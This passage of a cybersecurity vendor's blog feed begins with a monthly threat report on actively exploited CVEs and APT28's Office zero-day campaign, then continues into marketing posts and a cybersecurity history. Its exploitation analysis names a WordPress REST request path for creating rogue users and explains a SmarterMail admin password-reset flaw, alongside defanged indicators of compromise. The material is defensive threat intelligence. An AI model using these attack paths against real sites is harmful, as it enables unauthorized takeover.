            <div><a href="https://github.com/search?q=CVE-2026-24423&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-21509">CVE-2026-21509</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div><a href="https://github.com/search?q=CVE-2026-21509&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24858">CVE-2026-24858</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24858&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-40551">CVE-2025-40551</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1281">CVE-2026-1281</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1281&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1340">CVE-2026-1340</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1340&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2018-14634">CVE-2018-14634</a></div>
            <div>99</div>
            <div>Linux Kernel</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div><a href="https://github.com/search?q=CVE-2018-14634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-52691">CVE-2025-52691</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2025-52691&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2024-37079">CVE-2024-37079</a></div>
            <div>99</div>
            <div>Broadcom VMware vCenter Server</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-68645">CVE-2025-68645</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-98 (PHP Remote File Inclusion)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68645&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-34026">CVE-2025-34026</a></div>
            <div>99</div>
            <div>Versa Concerto</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-31125">CVE-2025-31125</a></div>
            <div>99</div>
            <div>Vite Vitejs</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-284 (Improper Access Control)</div>
            <div><a href="https://github.com/search?q=CVE-2025-31125&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-54313">CVE-2025-54313</a></div>
            <div>99</div>
            <div>Prettier eslint-config-prettier</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-8110">CVE-2025-8110</a></div>
            <div>89</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2009-0556">CVE-2009-0556</a></div>
            <div>89</div>
            <div>Microsoft Office</div>
            <div>CWE-94 (Code Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-37164">CVE-2025-37164</a></div>
            <div>89</div>
            <div>Hewlett Packard Enterprise OneView</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-37164&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in January 2026</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Microsoft</strong> faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509</li>
          <li><strong>SmarterTools</strong> accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE</li>
          <li><strong>Cisco</strong> saw two critical flaws in Identity Services Engine and Unified Communications Manager</li>
          <li><strong>Ivanti</strong> dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile</li>
          <li>Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-94</strong> – Code Injection</li>
          <li><strong>CWE-288</strong> – Authentication Bypass Using an Alternate Path or Channel</li>
          <li><strong>CWE-200</strong> – Exposure of Sensitive Information to an Unauthorized Actor</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>APT28's Operation Neusploit marked January's most sophisticated campaign:</strong></p>
        <ul>
          <li>Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files</li>
          <li>Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses</li>
          <li>Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant</li>
          <li>Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2026-21509 | Microsoft Office</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by APT28</p>
        <p><strong>Why this matters:</strong> Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.</p>
        <p><strong>Affected versions:</strong> Microsoft 365 and Microsoft Office (versions not specified in advisory)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install Microsoft's out-of-band update released January 26, 2026</li>
          <li>Search email systems for RTF attachments with embedded malicious droppers</li>
          <li>Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM</li>
          <li>Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot</li>
          <li>Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints</li>
          <li>Hunt for scheduled tasks named "OneDriveHealth" and suspicious files in %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png</li>
          <li>Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d8e4dc50a83f9e11b1c9b0b7e1e5476bd9fb3016.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="779" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2026-23760 | SmarterTools SmarterMail</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added January 26, 2026</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.</p>
        <p><strong>Affected versions:</strong> SmarterTools SmarterMail prior to build 9511</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade to build 9511 or later immediately</li>
          <li>Review administrator account activity logs for unauthorized password resets</li>
          <li>Check the Volume Mounts configuration for suspicious command entries</li>
          <li>Review administrator access patterns and session logs</li>
          <li>Audit system for unauthorized changes made with compromised admin access</li>
        </ul>
        <h3>CVE-2026-1281 &amp; CVE-2026-1340 | Ivanti Endpoint Manager Mobile</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: CVE-2026-1281 added January 29, 2026</p>
        <p><strong>Why this matters:</strong> Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.</p>
        <p><strong>Affected versions:</strong> Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm</li>
          <li>Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)</li>
          <li>Monitor for unusual Apache RewriteMap activity</li>
          <li>Review logs for crafted HTTP parameters to app store retrieval routes</li>
          <li>Check for unauthorized code execution attempts via RewriteRule handling</li>
        </ul>
        <p><strong>Exposure:</strong> EPMM instances accessible over corporate networks or VPN connections</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13dd09f2863edb79f18c40c52cdf0379e47eecaf5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Risk Rules History from</em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Technical Deep Dive: Exploitation Analysis</h2>
        <h3>APT28's Operation Neusploit (CVE-2026-21509)</h3>
        <p><strong>The multi-stage attack chain:</strong> CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:</p>
        <ul>
          <li><strong>Initial delivery</strong> – Specially-crafted RTF file exploits CVE-2026-21509</li>
          <li><strong>Server-side evasion</strong> – Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent</li>
          <li><strong>Dropper variants</strong> – Two distinct infection paths deployed based on targeting:
            <ul>
              <li><strong>Variant 1 (MiniDoor):</strong> Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses</li>
              <li><strong>Variant 2 (PixyNetLoader):</strong> Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking</li>
            </ul>
          </li>
        </ul>
        <p><strong>Why this matters:</strong> APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.</p>
        <h3>Modular DS WordPress Plugin Exploitation (CVE-2026-23550 &amp; CVE-2026-23800)</h3>
        <p><strong>The authentication bypass chain:</strong> CVE-2026-23550 enables administrator-level access without authentication:</p>
        <ul>
          <li>Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification</li>
          <li>/api/modular-connector/login flow grants access based on site connector enrollment state</li>
          <li>If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session</li>
          <li>CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&amp;origin=mo&amp;type=x</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23550:</strong></p>
        <ul>
          <li>45[.]11[.]89[.]19</li>
          <li>185[.]196[.]0[.]11</li>
          <li>64[.]188[.]91[.]37</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23800:</strong></p>
        <ul>
          <li>62[.]60[.]131[.]161</li>
          <li>185[.]102[.]115[.]27</li>
          <li>backup[@]wordpress[.]com</li>
          <li>backup1[@]wordpress[.]com</li>
        </ul>
        <p><strong>Why this matters:</strong> WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.</p>
        <h3>SmarterMail Authentication Bypass (CVE-2026-23760)</h3>
        <p><strong>The password reset flaw:</strong> CVE-2026-23760 exposes privileged password reset to anonymous callers:</p>
        <ul>
          <li>ForceResetPassword controller attribute explicitly permits unauthenticated access</li>
          <li>Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context</li>
          <li>System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword</li>
          <li>Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls</li>
        </ul>
        <p><strong>Why this matters:</strong> Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.</p>
        <h2>Detection &amp; Remediation Resources</h2>
        <h3>Nuclei Templates from Insikt Group®</h3>
        <p>Recorded Future customers can access Nuclei templates for:</p>
        <ul>
          <li><strong>CVE-2025-8110 (Gogs)</strong> – Version detection and fingerprinting check</li>
          <li><strong>CVE-2026-23760 (SmarterMail)</strong> – Authentication bypass validation</li>
        </ul>
        <h3>Recorded Future Product Integrations</h3>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize based on active exploitation data, including APT28 targeting</li>
          <li><strong><a href="https://www.recordedfuture.com/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets</li>
          <li><strong><a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Monitor vendor vulnerabilities across your supply chain</li>
        </ul>
        <h2>January 2026 Summary</h2>
        <p><strong>State-sponsored zero-days return.</strong> APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.</p>
        <p><strong>Authentication bypass dominates enterprise risk.</strong> Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.</p>
        <p><strong>Legacy vulnerabilities persist.</strong> CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.</p>
        <h2>Take Action</h2>
        <p>Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our <a href="https://www.recordedfuture.com/demo">demo center</a> for live examples, or dive deeper with <a href="https://www.recordedfuture.com/research">Insikt Group research</a> for technical threat intelligence.</p>
        <p><strong>About Insikt Group®:</strong></p>
        <p>Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Network Intelligence: Your Questions, Global Answers]]></title>
            <link>https://www.recordedfuture.com/blog/network-intelligence-questions-answered</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/network-intelligence-questions-answered</guid>
            <pubDate>Mon, 16 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how network intelligence gives security teams control over threat investigation with global visibility—no more drowning in generic, passive threat feeds.]]></description>
            <content:encoded><![CDATA[
        <h2>The Problem with Pre-Packaged Intelligence</h2>
        <p>Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.</p>
        <p>The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.</p>
        <p>Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.</p>
        <h2>What Network Intelligence Actually Means</h2>
        <p>Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.</p>
        <p>At Recorded Future, our network intelligence capabilities provide access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.</p>
        <h2>What This Means in Practice</h2>
        <p>Consider what changes when your security operations can query global network intelligence.</p>
        <p><strong>Faster SOC Triage</strong></p>
        <p>Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.</p>
        <p><strong>Targeted or Opportunistic? Now You'll Know</strong></p>
        <p>When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.</p>
        <p><strong>Fraud Infrastructure Exposed</strong></p>
        <p>Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.</p>
        <p><strong>Attribution That Actually Holds Up</strong></p>
        <p>Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.</p>
        <h2>Integration Into Security Workflows</h2>
        <p>Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.</p>
        <h2>When Expertise Becomes Essential</h2>
        <p>For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.</p>
        <p>Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.</p>
        <h2>The Compliance Framework That Enables Trust</h2>
        <p>Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy, which prohibits surveillance, profiling of individuals, and political targeting. Access is invitation-only, requiring vetting and agreement to specific terms of use.</p>
        <p>These aren't just policies; they are foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.</p>
        <h2>Moving Forward</h2>
        <p>The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.</p>
        <p>Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.</p>
        <p>What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_188ef07891988f2f97aad055a1f5a7c089fb55765.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Fragmentation Defined 2025's Threat Landscape. Here's What It Means for 2026]]></title>
            <link>https://www.recordedfuture.com/blog/fragmentation-in-2025-what-it-means-for-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/fragmentation-in-2025-what-it-means-for-2026</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The global threat landscape didn't simplify in 2025 — it shattered. The 2026 State of Security report represents Insikt Group's most comprehensive threat intelligence analysis to date, drawing on proprietary intelligence, network telemetry, and deep geopolitical research to help you stay ahead of converging threats.]]></description>
            <content:encoded><![CDATA[
        <p>Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.</p>
        <p>The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.</p>
        <p>But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.</p>
        <p>Today, Recorded Future's Insikt Group releases the <strong><a href="https://www.recordedfuture.com/research/state-of-security">2026 State of Security</a></strong> report, our most comprehensive annual analysis of the forces shaping global security.</p>
        <p>Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.</p>
        <h2>The End of Stability as a Baseline Assumption</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10c922a3a2103e396f22a400e3135d81ce6b0f02b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1220" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>2025 redefined international relations (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14120f6481cb46917d75b8ece722dda331953c861.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From 27 Steps to 5: How Recorded Future Reimagined Threat Hunting with Autonomous Threat Operations]]></title>
            <link>https://www.recordedfuture.com/blog/threat-hunting-27-steps-to-5</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-hunting-27-steps-to-5</guid>
            <pubDate>Wed, 11 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Autonomous Threat Operations reduces 27 manual steps to as few as 5 largely automated ones, delivering the speed, scale, and effectiveness that the modern threat landscape demands.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>The manual operations gap can be a business risk</li>
                <li>Manual threat hunting requires 27 steps that burn analyst time</li>
                <li>Autonomous Threat Operations can reduce 27 steps to 5</li>
                <li>Autonomous operations prove measurable ROI</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[A Complete History of Cybersecurity: From Early Viruses to AI-Powered Threats]]></title>
            <link>https://www.recordedfuture.com/blog/cybersecurity-history</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/cybersecurity-history</guid>
            <pubDate>Sun, 08 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A comprehensive history of cybersecurity and the eras of threat on the internet.]]></description>
            <content:encoded><![CDATA[
        <p>Cybersecurity is a cornerstone of our modern world, but its roots stretch back long before the internet. Far from a recent phenomenon, the field began in university labs and evolved through decades of innovation and conflict. For professionals and everyday users alike, tracing this history reveals why today's defenses exist and why vigilance remains our most critical tool.</p>
        <h2>The 1940s: Theoretical Seeds and Massive Machines</h2>
        <p>Long before the first hack, pioneers were already contemplating the risks of digital intelligence. In 1945, the Electronic Numerical Integrator and Computer (ENIAC) - the first general-purpose electronic computer - showcased the power of computing, though it was a room-sized giant reserved for military use. While the idea of a "cybercriminal" was still science fiction, the theoretical groundwork for future threats was being laid.</p>
        <p>Mathematician John von Neumann began developing his "Theory of Self-Reproducing Automata" during this era. He proposed that a machine-based organism could replicate itself across systems - the conceptual birth of the computer virus.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Physical Isolation: Security meant locking the door to a room-sized machine.</li>
          <li>Government Monopoly: Computers were exclusive to the military and the academic elite.</li>
          <li>Conceptual Threats: Risks were purely mathematical theories rather than practical realities.</li>
          <li>The Virus Blueprint: The foundational logic for self-replicating code was established.</li>
        </ul>
        <p>By understanding these early foundations, we can appreciate how a field born in the realm of theory has become the frontline of global stability.</p>
        <ul>
          <li><a href="https://www.hp.com/us-en/shop/tech-takes/computer-history-all-about-the-eniac">The ENIAC: America's Pioneering Electronic Computer</a></li>
          <li><a href="https://www.ias.edu/von-neumann">The Life, Work, and Legacy of John von Neumann</a></li>
        </ul>
        <h2>The 1950s: Mainframes, Physical Security, and Phone Phreaking</h2>
        <p>Governments, universities, and major businesses started using large, centralized machines known as mainframes. As these computers grew more powerful, the definition of "security" remained grounded in the physical world. During this era, <a href="https://www.recordedfuture.com/services/intelligence-services">data protection</a> simply meant controlling access to the room where the hardware sat. However, a new kind of technical subculture was beginning to emerge on the fringes of the telecommunications industry.</p>
        <p>The 1950s saw the rise of phone phreaking, where enthusiasts exploited telephone signaling frequencies to make unauthorized long-distance calls. While not yet digital hacking, this movement introduced the concept of manipulating infrastructure for unintended purposes. This culture of curiosity and boundary-pushing would eventually produce industry titans; notably, both Steve Jobs and Steve Wozniak experimented with phreaking technology before the birth of Apple.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Physical Perimeter: Security was defined by locks and restricted personnel access.</li>
          <li>Phone Phreaking: The first widespread exploitation of a technological network.</li>
          <li>Nascent Authentication: Password-based systems began to appear in informal, non-standardized forms.</li>
          <li>Fragmented Protocols: Without a connected internet, every institution developed its own isolated security rules.</li>
        </ul>
        <p>These early exploits proved that even the most robust physical defenses could be bypassed by those who understood the hidden language of the systems within.</p>
        <ul>
          <li><a href="https://cybersecurityventures.com/hacking-before-the-internet/">Phone Phreaking: Hacking Before The Internet</a></li>
          <li><a href="https://www.chaintech.network/blog/year-1971-early-days-of-phone-phreaking-with-steve-wozniak-steve-jobs/">Year 1971: Early Days Of Phone Phreaking With Steve Wozniak &amp; Steve Jobs</a></li>
        </ul>
        <h2>The 1960s: The First Hackers and Growing Vulnerabilities</h2>
        <p>While known primarily for its social shifts, the 1960s also marked the birth of "hacking" as a technical practice. As computers became more prevalent in universities and large institutions, a new generation of users began exploring the limits of these systems. This era shifted the focus from purely physical security to the inherent vulnerabilities within the software itself.</p>
        <p>In 1967, IBM invited students to test a new system, only to be surprised that their probing caused system crashes and revealed weaknesses. This informal "penetration test" proved that any system accessible to users was inherently open to exploitation. It was a wake-up call that sparked the transition of cybersecurity from a passive state to an active, intellectual discipline.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Intentional Probing: The birth of deliberate <a href="https://www.recordedfuture.com/resources/maturity-assessment">vulnerability testing</a> and "white hat" exploration.</li>
          <li>Curiosity-Driven Hacking: Hacking emerged as a way to explore system boundaries, generally motivated by academic interest rather than malice.</li>
          <li>Access vs. Security: Institutions realized that providing user access created inevitable security risks.</li>
          <li>Beyond the Lock: The realization that cybersecurity required ongoing digital strategy, not just physical barriers.</li>
        </ul>
        <p>This decade transformed the computer from a mysterious black box into a challenge to be solved, proving that human ingenuity would always be the greatest threat - and defense - to any system.</p>
        <ul>
          <li><a href="https://www.academia.edu/28863235/History_of_Hacking">The History of Hacking</a></li>
